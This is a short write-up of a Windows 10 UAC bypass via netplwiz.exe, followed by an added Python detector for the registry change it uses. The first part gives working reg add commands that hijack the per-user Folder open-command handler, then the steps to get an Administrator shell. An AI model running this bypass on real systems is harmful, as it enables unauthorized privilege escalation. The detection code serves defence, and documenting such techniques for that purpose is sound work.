GUI UAC bypass (netplwiz.exe)
- Type: GUI Hack
- Method: Registry key manipulation
- Target: \system32\netplwiz.exe
- Component(s): Attacker defined
- Works from: Windows 10
The handler registered under HKCU\Software\Classes\Folder\shell\open\command is called when the "Manage Passwords" button is clicked in netplwiz.exe.
Steps to reproduce:
- Run the command:
reg add "HKCU\Software\Classes\Folder\shell\open\command" /d "cmd.exe /c cmd.exe" /f && reg add HKCU\Software\Classes\Folder\shell\open\command /v "DelegateExecute" /f
- Run netplwiz.exe from cmd.
- Select the "Advanced" tab, and click the "Manage Passwords" button.
- You will then get an Administrator shell.
Rollback command:
reg delete "HKCU\Software\Classes\Folder\shell\open\command" /f
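
Detection side of the registry change above, as an added example that is not part of the original page: it scans registry value-set events for per-user overrides of Folder\shell\open\command and rates a user as high severity when both the default value and DelegateExecute were written. The event field names, the "(Empty)" detail string and the sample SIDs are assumptions modelled on Sysmon-style telemetry.

```python
import re
from collections import defaultdict

# Per-user class registrations surface as HKU\<SID>_Classes\... (or
# HKU\<SID>\Software\Classes\...) in registry telemetry.
KEY_RE = re.compile(
    r"^HKU\\(?P<sid>S-1-5-21-[\d-]+)(?:_Classes|\\Software\\Classes)"
    r"\\Folder\\shell\\open\\command\\(?P<value>[^\\]+)$",
    re.IGNORECASE,
)

# Constructed sample events (not captured from a real host); SIDs are made up.
BASE = r"HKU\S-1-5-21-1111-2222-3333-"
CMD = r"_Classes\Folder\shell\open\command" + "\\"
SAMPLE_EVENTS = [
    {"event_type": "SetValue", "target": BASE + "1001" + CMD + "(Default)",
     "details": "cmd.exe /c cmd.exe"},
    {"event_type": "SetValue", "target": BASE + "1001" + CMD + "DelegateExecute",
     "details": "(Empty)"},
    {"event_type": "SetValue", "details": "Binary Data",  # unrelated key
     "target": BASE + "1002" + r"_Classes\.txt\OpenWithProgids\txtfile"},
    {"event_type": "SetValue", "target": BASE + "1003" + CMD + "(Default)",
     "details": "notepad.exe"},  # default value only, no DelegateExecute
]


def find_folder_handler_hijacks(events):
    """Map each user SID to the Folder open-command override seen for it."""
    per_user = defaultdict(lambda: {"command": None, "delegate_execute": False})
    for ev in events:
        if ev.get("event_type") != "SetValue":
            continue
        m = KEY_RE.match(ev.get("target", ""))
        if not m:
            continue
        state = per_user[m["sid"]]
        name = m["value"].lower()
        if name == "delegateexecute":
            state["delegate_execute"] = True
        elif name == "(default)":
            state["command"] = ev.get("details")
    findings = {}
    for sid, state in per_user.items():
        # Both values written for one user matches the sequence on this page.
        both = bool(state["command"]) and state["delegate_execute"]
        findings[sid] = dict(state, severity="high" if both else "medium")
    return findings
```

A per-user Folder\shell\open\command key is rare on a clean profile, so even the "medium" case is worth reviewing.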